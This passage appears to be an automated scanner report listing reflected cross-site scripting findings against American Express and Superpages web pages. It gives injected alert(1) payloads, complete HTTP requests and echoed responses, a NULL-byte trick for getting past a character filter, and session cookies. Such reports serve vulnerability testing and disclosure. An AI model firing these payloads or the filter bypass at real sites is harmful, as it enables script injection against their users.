<head> <title>OPEN from Amer ...[SNIP]... <script type="text/javascript"> var aj_queryString = "inav=footer_small_business_credit_cards52396";alert(1)//a663c189a2b"; </script> ...[SNIP]...
1.537. http://www201.americanexpress.com/business-credit-cards/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www201.americanexpress.com
Path:
/business-credit-cards/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 15a54"%3balert(1)//fd4c9d0046f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 15a54";alert(1)//fd4c9d0046f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /business-credit-cards/?15a54"%3balert(1)//fd4c9d0046f=1 HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head> <title>OPEN from Amer ...[SNIP]... <script type="text/javascript"> var aj_queryString = "15a54";alert(1)//fd4c9d0046f=1"; </script> ...[SNIP]...
The value of the view-all-business-cards&inav request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 44aa5"%3balert(1)//7dd45ad0d89 was submitted in the view-all-business-cards&inav parameter. This input was echoed as 44aa5";alert(1)//7dd45ad0d89 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /business-credit-cards/?view-all-business-cards&inav=menu_cards_sbc_viewallcards44aa5"%3balert(1)//7dd45ad0d89 HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000OWl25Hw-p5p9o_dRR-NwERg:1115nbqmn; SaneID=173.193.214.243-1296742163652146;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:15:11 GMT Server: IBM_HTTP_Server Set-Cookie: homepage=b;Expires=Thu, 10-Feb-2011 14:15:11 GMT Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 71876
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head> <title>OPEN from Amer ...[SNIP]... <script type="text/javascript"> var aj_queryString = "inav=menu_cards_sbc_viewallcards44aa5";alert(1)//7dd45ad0d89"; </script> ...[SNIP]...
1.539. http://www201.americanexpress.com/business-credit-cards/business-credit-cards [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www201.americanexpress.com
Path:
/business-credit-cards/business-credit-cards
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00d7597"><script>alert(1)</script>c7d4c5b0106 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d7597"><script>alert(1)</script>c7d4c5b0106 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /business-credit-cards/business-credit-cards?%00d7597"><script>alert(1)</script>c7d4c5b0106=1 HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
1.540. http://www201.americanexpress.com/business-credit-cards/business-credit-cards [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www201.americanexpress.com
Path:
/business-credit-cards/business-credit-cards
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8efe8"%3balert(1)//d1240e2685e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8efe8";alert(1)//d1240e2685e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /business-credit-cards/business-credit-cards?8efe8"%3balert(1)//d1240e2685e=1 HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of the source request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00d8dc2"><script>alert(1)</script>6a405ec230b was submitted in the source parameter. This input was echoed as d8dc2"><script>alert(1)</script>6a405ec230b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /business-credit-cards/business-credit-cards?source=footer_small_business_credit_cards%00d8dc2"><script>alert(1)</script>6a405ec230b HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of the source request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3cde0"%3balert(1)//2536ed24016 was submitted in the source parameter. This input was echoed as 3cde0";alert(1)//2536ed24016 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /business-credit-cards/business-credit-cards?source=footer_small_business_credit_cards3cde0"%3balert(1)//2536ed24016 HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of the sj_tabToOpen request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload de360%3balert(1)//2236b1cd6cb was submitted in the sj_tabToOpen parameter. This input was echoed as de360;alert(1)//2236b1cd6cb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /getthecard/home?sj_tabToOpen=1de360%3balert(1)//2236b1cd6cb&inav=menu_cards_pc_choosecard HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:08:19 GMT Server: IBM_HTTP_Server Set-Cookie: SaneID=173.193.214.243-1296742099505091; path=/; expires=Sun, 07-Feb-16 14:08:19 GMT; domain=.americanexpress.com Set-Cookie: JSESSIONID=0000oTYlMuvkOz4vp-E22WS5ugk:10ue6mmd9;Path=/ Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 48599
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <script src="htt ...[SNIP]... <script type="text/javascript"> var sj_responseText=""; var sj_rsvpStatus=""; var sj_offerURL=""; var sj_rsvpAttempts= 0; var sj_pageContext="Prospect"; var sj_tabToOpen = 1de360;alert(1)//2236b1cd6cb; var sj_modalToOpen = "null"; var sj_servername = "www201.americanexpress.com"; </script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 87daf"-alert(1)-"1a7bb763e07 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile87daf"-alert(1)-"1a7bb763e07/css/busprofile.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6d043"-alert(1)-"ea78a66d4f3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile/css6d043"-alert(1)-"ea78a66d4f3/busprofile.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14dd6"-alert(1)-"584c21ff5a6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile/css/busprofile.css14dd6"-alert(1)-"584c21ff5a6 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 46554"-alert(1)-"be25698ff9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile46554"-alert(1)-"be25698ff9/css/print.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b6866"-alert(1)-"0f304c70d9e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile/cssb6866"-alert(1)-"0f304c70d9e/print.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ff3b0"-alert(1)-"0f9464b5bb7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile/css/print.cssff3b0"-alert(1)-"0f9464b5bb7 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49cd4"-alert(1)-"96eceb6ffe4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile49cd4"-alert(1)-"96eceb6ffe4/js/busprofile.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b019f"-alert(1)-"5e23dbe0df5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile/jsb019f"-alert(1)-"5e23dbe0df5/busprofile.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload af28c"-alert(1)-"d5cdefab79b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile/js/busprofile.jsaf28c"-alert(1)-"d5cdefab79b HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload edb86"-alert(1)-"af2b6080645 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofileedb86"-alert(1)-"af2b6080645/js/csiframe.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1bae2"-alert(1)-"d1c4fd37467 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile/js1bae2"-alert(1)-"d1c4fd37467/csiframe.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1dd87"-alert(1)-"26871eafe34 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile/js/csiframe.js1dd87"-alert(1)-"26871eafe34 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3c75"-alert(1)-"933c529b5ba was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofileb3c75"-alert(1)-"933c529b5ba/js/hide.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload de57b"-alert(1)-"653154b748 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile/jsde57b"-alert(1)-"653154b748/hide.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 30f72"-alert(1)-"1d6df26e138 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile/js/hide.js30f72"-alert(1)-"1d6df26e138 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 41f5f"-alert(1)-"a4339366c19 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile41f5f"-alert(1)-"a4339366c19/js/photos.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9bda1"-alert(1)-"1e48a19052d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile/js9bda1"-alert(1)-"1e48a19052d/photos.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 92aa7"-alert(1)-"ad045aaf68e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
